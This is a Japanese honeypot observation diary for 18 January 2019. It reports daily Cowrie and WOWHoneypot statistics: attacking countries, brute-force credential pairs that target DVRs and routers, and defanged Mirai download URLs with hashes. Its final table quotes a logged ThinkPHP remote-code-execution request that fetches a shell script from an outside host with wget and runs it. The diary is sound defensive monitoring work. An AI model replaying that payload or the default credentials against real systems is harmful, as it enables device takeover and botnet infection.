ハニーポット観察日記(2019/01/18)

はじめに
Cowrie
WOWHoneypot

はじめに

こんにちは。cute_otterです。
今日からCowrieのログの簡易分析を再開しました。

Cowrie

ハニーポット「Cowrie」で2019/01/18 (金) 00:00~23:59 UTC(運用66日目)に取得したログの簡易分析です。

概況

集計期間 : 2019/01/18 (金) 00:00~23:59 UTC
総アクセス件数 : 312,577 件 (前日比 - 件)
ログイン試行 : 6,579 件 (前日比 - 件)
SSHコネクション : 3,340 件 (前日比 - 件)
Telnetコネクション : 3,518 件 (前日比 - 件)
ユニークIPアドレス : 413 件 (前日比 - 件)
アクセス元の国 : 59 件 (前日比 - カ国)
TTY : 3,374 件 (前日比 - 件)
スキャンと思われるコネクション : 131 件 (前日比 - 件)

ダッシュボード

ダッシュボードは以下の通りです。

国別のアクセス件数

国別のアクセス件数の変遷は以下の通りです。

続いて、国別のアクセス件数(上位20位)は以下の通りです。

順位	国名	件数	前日の順位	前日の件数	件数差	備考
1.	Italy	174,824	-	-	-	-
2.	United States	76,967	-	-	-	-
3.	Netherlands	21,059	-	-	-	-
4.	United Kingdom	12,929	-	-	-	-
5.	Ireland	8,456	-	-	-	-
6.	Singapore	6,287	-	-	-	-
7.	Romania	2,912	-	-	-	-
8.	Russia	2,450	-	-	-	-
9.	Germany	2,380	-	-	-	-
10.	Latvia	1,037	-	-	-	-
11.	Sweden	596	-	-	-	-
12.	China	531	-	-	-	-
13.	Vietnam	525	-	-	-	-
14.	India	422	-	-	-	-
15.	Brazil	222	-	-	-	-
16.	France	217	-	-	-	-
17.	Republic of Korea	89	-	-	-	-
18.	Bangladesh	73	-	-	-	-
19.	Canada	49	-	-	-	-
20.	Colombia	48	-	-	-	-

イタリアからのアクセスが1~6時に集中していました。
- 一つのIPアドレスから174,182件(174,824件中)のアクセスがありました。
アメリカからのアクセスは一日を通して安定していました。
- 一つのIPアドレスから69,599件(76,967件中)のアクセスがありました。
オランダからのアクセスが2時、12時、15~16時、20時に集中していました。
- 一つのIPアドレスから20,998件(21,059件中)のアクセスがありました。

国別のユニークIPアドレスの件数

国別のユニークIPアドレスの件数(上位20位)は以下の通りです。

順位	国名	件数	前日の順位	前日の件数	件数差	備考
1.	China	72	-	-	-	-
2.	United States	52	-	-	-	-
3.	Vietnam	29	-	-	-	-
4.	France	28	-	-	-	-
5.	Brazil	16	-	-	-	-
6.	United Kingdom	16	-	-	-	-
7.	Russia	16	-	-	-	-
8.	Germany	15	-	-	-	-
9.	India	15	-	-	-	-
10.	Italy	12	-	-	-	-
11.	Republic of Korea	11	-	-	-	-
12.	Singapore	9	-	-	-	-
13.	Canada	8	-	-	-	-
14.	Netherlands	8	-	-	-	-
15.	Ireland	8	-	-	-	-
16.	Taiwan	8	-	-	-	-
17.	Sweden	7	-	-	-	-
18.	Colombia	7	-	-	-	-
19.	Hong Kong	6	-	-	-	-
20.	Bangladesh	5	-	-	-	-

国別のログイン試行の件数

国別のログイン試行の件数(上位20位)は以下の通りです。

順位	国名	件数	前日の順位	前日の件数	件数差	備考
1.	Italy	1,641	-	-	-	-
2.	United Kingdom	1,526	-	-	-	-
3.	Ireland	1,283	-	-	-	-
4.	United States	827	-	-	-	-
5.	Netherlands	457	-	-	-	-
6.	Russia	177	-	-	-	-
7.	Singapore	144	-	-	-	-
8.	Romania	94	-	-	-	-
9.	China	72	-	-	-	-
10.	Germany	67	-	-	-	-
11.	Sweden	54	-	-	-	-
12.	Vietnam	49	-	-	-	-
13.	France	30	-	-	-	-
14.	Latvia	23	-	-	-	-
15.	India	19	-	-	-	-
16.	Brazil	17	-	-	-	-
17.	Republic of Korea	12	-	-	-	-
18.	Bangladesh	9	-	-	-	-
19.	Canada	9	-	-	-	-
20.	Colombia	7	-	-	-	-

ログイン試行で使用されたユーザ名とパスワード

ログイン試行の際に使用されたユーザ名とパスワードの組み合わせ(上位20位)は以下の通りです。

順位	ユーザ名	パスワード	件数	前日の順位	前日の件数	件数差	備考
1.	admin	admin	2,975	-	-	-	-
2.	root	88888888	556	-	-	-	DVRを狙ったものと思われる(参照)
3.	root	GM8182	293	-	-	-	Grain Media製のDVRを狙ったものと思われる(参照)
4.	guest	123456	281	-	-	-	-
5.	admin	admin1	276	-	-	-	-
6.	support	1234	274	-	-	-	-
7.	root	12345	198	-	-	-	-
8.	admin	smcadmin	144	-	-	-	SMC Networks製のルーターを狙ったものと思われる(参照)
9.	admin	(空欄)	142	-	-	-	-
10.	admin	ZmqVfoSIP	137	-	-	-	-
11.	admin	1234	131	-	-	-	-
12.	root	taZz@23495859	72	-	-	-	-
13.	root	solokey	48	-	-	-	ZKSoftware製の端末を狙ったものと思われる(参照)
14.	root	anko	40	-	-	-	Shenzhen ANKO Tech製のDVRを狙ったものと思われる(参照)
15.	root	tsgoingon	37	-	-	-	-
16.	root	root123	27	-	-	-	-
17.	telnetadmin	telnetadmin	22	-	-	-	-
18.	admin	ipcam_rt5350	21	-	-	-	-
19.	user	user	21	-	-	-	-
20.	root	vizxv	20	-	-	-	Zhejiang Dahua Technology製のカメラを狙ったものと思われる(参照)

admin/adminの組み合わせのうち約94%がイギリスとアイルランドからのログイン試行の際に使用されていました。
- イギリスが1,516件(2,975件中)、アイルランドが1,273件(2,975件中)でした。
root/88888888、root/GM8182、guest/123456、admin/admin1、support/1234の組み合わせがイタリアからのログイン試行の際に多く使用されていました。
- root/88888888は530件(556件中)でした。
- root/GM8182は268件(293件中)でした。
- guest/123456は266件(281件中)でした。
- admin/admin1は265件(276件中)でした。
- support/1234は263件(274件中)でした。

ダウンロードされたファイル

ダウンロードされたファイルは以下の通りです。

※VT : VirusTotal

順位	備考	ダウンロード元	MD5	検出率(VT)	件数
1.	Mirai	hxxp://195[.]231[.]0[.]120:80/AB4g5/Josho[.]x86	d5f9953e5209ebe670208ff55155fa6e	20/59	1,538
2.	Mirai	hxxp://185[.]244[.]25[.]221:80/bins/Yowai[.]x86	2fbc81a4d25af7bdd609addbdc3e59aa	12/57	439
3.	Mirai	hxxp://198[.]98[.]62[.]237:80/bins/mirai[.]x86	4147e375f325878fe3c3962c3d4ac411	37/57	397
4.	Gafgyt or Mirai	hxxp://178[.]128[.]214[.]44:80/Kuso69/Akiru[.]x86	0f6fa2e22d9de3864e7d60ed6c0cb4b5	35/60	135
5.	Mirai	hxxp://142[.]93[.]24[.]154:80/vb/Amakano[.]x86	046f51c1b84a90db7074d66e9b65967f	27/60	61
6.	Mirai(ダウンローダー)	hxxp://89[.]46[.]223[.]247/8UsA[.]sh	3dae78adf9f4a8520afb9ff9d701d3ab	28/58	59
7.	Mirai(ダウンローダー)	hxxp://209[.]141[.]46[.]133/bins[.]sh	5682bddae3a2946670a044e9e5d83e09	27/58	42
8.	Mirai	hxxp://157[.]230[.]29[.]251:80/bins/Solar[.]x86	b06b3c1bca6b86d2d88e0ab476ae97fc	25/61	42
9.	Mirai	hxxp://193[.]148[.]69[.]33:80/bins/telnet[.]x86	5992df2c67bb83df6ad5ea01e0af5ec6	19/58	30
10.	Mirai	hxxp://194[.]147[.]35[.]54:80/ankit/os[.]x86	f3f8482080265f3dc145fe9029038704	25/58	29
11.	Mirai	hxxp://194[.]36[.]173[.]4:80/vi/x86[.]bushido	236cc078eb84e9e14f1112a52e74abc9	35/59	20
12.	Mirai	hxxp://46[.]183[.]218[.]243:80/33bi/Ares[.]x86	e68bd8a8712ce1788faa15c9813c00ab	22/59	19
13.	Mirai	hxxp://35[.]235[.]102[.]123:80/AB4g5/Josho[.]x86	8e4a0a4408c3351e132e56ca32e7c4d5	21/58	9
14.	Mirai(ダウンローダー)	hxxp://45[.]62[.]249[.]171/sensi[.]sh	1090c808402468f6a03e326870b414d1	23/58	8
15.	Mirai	hxxp://139[.]59[.]25[.]145:80/bins/sora[.]x86	e4ae3f23bbdbcb67b52be4616ffe280b	24/59	7
16.	Mirai	hxxp://209[.]141[.]43[.]15:80/bins/mirai[.]x86	256e4d3c013fe49c6166da2d3ba0c524	22/58	7
17.	Mirai	hxxp://bot[.]sunless[.]network:80/sunless[.]x86	06a8ac27ca066c417459186e4b3abf0a	22/58	6
18.	Mirai	hxxp://34[.]80[.]139[.]3:80/AB4g5/Josho[.]x86	62418c99fa5ece15bc60d59bde27b308	19/57	5
19.	Mirai	hxxp://168[.]235[.]103[.]89:80/bins/kirai[.]x86	8136de7bf98ab931951d2394511dd1e6	23/56	5

Mirai(亜種含む)が多くダウンロードされていました。
1位のd5f9953e5209ebe670208ff55155fa6eは全てイタリアからのアクセスによるセッション中にダウンロードされていました。
2位の2fbc81a4d25af7bdd609addbdc3e59aaは全てオランダからのアクセスによるセッション中にダウンロードされていました。

国別のダウンロードされたファイル

国別のダウンロードされたファイルは以下の通りです。

イタリア

順位	備考	ダウンロード元	MD5	検出率(VT)	件数
1.	Mirai	hxxp://195[.]231[.]0[.]120:80/AB4g5/Josho[.]x86	d5f9953e5209ebe670208ff55155fa6e	20/59	1,538
2.	Mirai(ダウンローダー)	hxxp://209[.]141[.]46[.]133/bins[.]sh	5682bddae3a2946670a044e9e5d83e09	27/58	41
3.	Mirai(ダウンローダー)	hxxp://45[.]62[.]249[.]171/sensi[.]sh	1090c808402468f6a03e326870b414d1	23/58	8

オランダ

順位	備考	ダウンロード元	MD5	検出率(VT)	件数
1.	Mirai	hxxp://185[.]244[.]25[.]221:80/bins/Yowai[.]x86	2fbc81a4d25af7bdd609addbdc3e59aa	12/57	439
2.	Mirai(ダウンローダー)	hxxp://209[.]141[.]46[.]133/bins[.]sh	5682bddae3a2946670a044e9e5d83e09	27/58	1

Cowrieで取得したログの簡易分析は以上です。

WOWHoneypot

ハニーポット「WOWHoneypot」で2019/01/18 (金) 00:00~23:59 UTC(運用15日目)に取得したログの簡易分析です。

概況

集計期間 : 2019/01/18 (金) 00:00~23:59 UTC
総アクセス件数 : 120 件 (前日比 -955 件)
- トップページへのアクセス : 109 件
- Gitのコンフィグファイルの探査 : 9 件
- D-Link製の製品の探査 : 1 件
- ThinkPHPフレームワークの脆弱性(RCE)を利用した攻撃 : 1 件
ユニークIPアドレス件数 : 57 件 (前日比 +23 件)
アクセス元の国数 : 17 カ国 (前日比 -1 カ国)

国別のアクセス件数

国別のアクセス件数は以下の通りです。

順位	国名	件数	前日の順位	前日の件数	件数差	備考
1.	China	79	1.	354	-275	-
2.	Brazil	13	6.	5	+8	-
3.	Seychelles	9	5.	9	+-0	-
4.	Russia	3	13.	1	+2	-
5.	United States	3	4.	12	-9	-
6.	Albania	2	-	0	+2	-
7.	Indonesia	1	17.	1	+-0	-
8.	Kyrgyzstan	1	-	0	+1	-
9.	Taiwan	1	-	0	+1	-
10.	Philippines	1	-	0	+1	-
11.	Singapore	1	-	0	+1	-
12.	Greece	1	-	0	+1	-
13.	Chile	1	-	0	+1	-
14.	Morocco	1	-	0	+1	-
15.	India	1	12.	1	+-0	-
16.	Burundi	1	-	0	+1	-
17.	Netherlands	1	-	0	+1	-

前日、アクセス件数が300件を超えていたベトナム、香港からのアクセスはありませんでした。
中国からのアクセスが前日より約300件減少しました。

アクセス先

アクセス先は以下の通りです。

順位	備考	アクセス先	件数	前日の順位	前日の件数	件数差
1.	トップページへのアクセス	GET / HTTP/1.1	104	2.	20	+84
2.	Gitのコンフィグファイルの探査	GET /.git/config HTTP/1.1	9	7.	9	+-0
3.	トップページへのアクセス	GET / HTTP/1.0	4	19.	5	-1
4.	D-Link製の製品の探査	GET /HNAP1/ HTTP/1.1	1	-	0	+1
5.	トップページへのアクセス	POST / HTTP/1.1	1	-	0	+1
6.	ThinkPHPフレームワークの脆弱性を利用した攻撃(参照) User-Agentは`Sefa`でした。	GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20hxxp://167[.]99[.]219[.]142/ex[.]sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1	1	-	0	+1